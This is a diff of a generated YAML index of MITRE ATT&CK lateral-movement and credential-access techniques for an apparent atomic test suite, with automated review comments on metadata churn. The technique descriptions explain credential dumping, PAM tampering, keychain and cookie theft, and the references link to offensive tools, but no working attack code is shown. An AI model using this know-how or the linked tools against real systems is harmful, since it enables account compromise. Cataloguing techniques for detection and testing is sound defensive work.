- 'Application Log: Application Log Content'
@@ -43706,7 +44382,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -43745,7 +44420,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
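Review bot: the `modified` value for T1210 goes backwards in this hunk, from `2022-05-11T14:00:00.188Z` to `2022-02-24T15:06:46.006Z`. The removed value shares its `14:00:00.188Z` clock reading with the old `modified` of T1550.003 (`2023-10-31T14:00:00.188Z`) and T1556.003 (`2022-05-11T14:00:00.188Z`), which looks like a release-wide bulk stamp rather than a real edit time, so the new earlier date may well be the object's genuine last change. That reasoning belongs in the commit message, since on its face a decreasing `modified` reads as a regression (the same thing happens for T1563.001 earlier in the patch).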
@@ -43779,12 +44454,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43812,10 +44485,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -43845,7 +44517,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -43907,12 +44578,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43936,11 +44606,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43965,9 +44634,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -44027,7 +44695,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -44082,7 +44749,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -44150,12 +44816,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -44212,6 +44877,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -44222,13 +44888,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -44287,7 +44952,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -44381,49 +45045,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
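Review bot: this hunk deletes the whole T1556.003 metadata block (platforms, contributors, `id`, `created`, all `external_references`) from the top of the object; the following hunk re-adds it after `x_mitre_data_sources`, so this is reordering rather than data loss, but a reader has to cross-check roughly forty removed lines against the next hunk to confirm that. The unchanged description lines at the end of this hunk (`pam_unix.so`, `, which retrieves`, `/etc/passwd`, `/etc/shadow`) carry stray line breaks inside the `|-` literal block that predate this change; because a literal block preserves newlines, the technique description is emitted with those breaks, and the generator should strip them in a follow-up.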
@@ -44438,20 +45063,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1056.001:
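Review bot: `x_mitre_permissions_required:` / `- root` is removed from T1556.003 in this hunk with no replacement, so the index loses the one field that records that modifying PAM modules requires root. If this reflects an upstream field deprecation it should be called out in the commit message, because downstream tooling that keys on required privilege (for example to decide `elevation_required` for an atomic test) will silently see no value. The rest of the hunk is the re-added metadata from the previous hunk plus `x_mitre_deprecated: false` and `revoked: false`; note that `PAM Creds` now sorts before `Red Hat PAM` in `external_references`, another order change with no content change.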
@@ -44531,12 +45193,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -44565,6 +45226,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -44576,18 +45238,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44614,9 +45276,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests:
- name: Brute Force Credentials of single Azure AD user
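Review bot: of the three lines removed here for T1110.001, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are re-added earlier in the same technique after `kill_chain_phases` and `x_mitre_is_subtechnique`, so this object now has its `x_mitre_*` keys in alphabetical order while T1550.003 and T1556.003 keep them after `object_marking_refs`. The key order appears to be inherited object by object from upstream; writing keys in one fixed order in the generator would stop the two layouts churning on every refresh. Separately, the unchanged context line `- name: Brute Force Credentials of single Azure AD user` still uses the old product name after the platform list above was changed to `Identity Provider`; out of scope for a generated index, but worth a follow-up in the test YAML.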
@@ -44671,7 +45330,7 @@ credential-access:
Write-Host "End of bruteforce"
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -44795,12 +45454,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -44815,10 +45473,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -44826,14 +45485,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -44876,14 +45535,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -44938,14 +45594,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44996,9 +45651,8 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests:
- name: Azure - Search Azure AD User Attributes for Passwords
@@ -45050,7 +45704,7 @@ credential-access:
elevation_required: true
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -45084,8 +45738,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -45102,11 +45756,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -45124,7 +45777,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -45141,10 +45794,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -45168,46 +45821,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
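Review bot: `spec_version: '2.1'` is dropped from T1110.002 in this hunk (and from T1555.001 and the other objects below) with no replacement. That key is mandatory on every STIX 2.1 object, so if any consumer validates or parses these `technique:` blocks as STIX, it will now reject them; if the index is only read by the atomic tooling that is harmless, but the PR description should say which. The remainder of the hunk is T1555.001's keys being emitted in a different order; the only value changes there are `modified`, the `External to DA` URL and retrieval date, and the spec-version bump, which is consistent with `x_mitre_version` staying at '1.1'.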
@@ -45228,65 +45847,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
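Review bot: nearly all of this hunk is T1555.001 content moved to a different key order (`kill_chain_phases`, `x_mitre_platforms`, `external_references` and `object_marking_refs` all relocate, and each reference's `url` now follows its `description` instead of preceding it); the semantic changes are the `External to DA` URL and retrieval date, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, `revoked: false` added and `spec_version` removed. If the generator serialises keys in whatever order the upstream JSON happens to carry them, emitting them in a fixed order would keep future ATT&CK refreshes reviewable instead of rewriting every object. Also note that the unchanged T1003.004 description context still ends the registry path `HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets` on its own line with the sentence's period on the next one, so the regeneration did not clean up that stripped-markup artefact.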
@@ -45295,6 +45911,9 @@ credential-access:
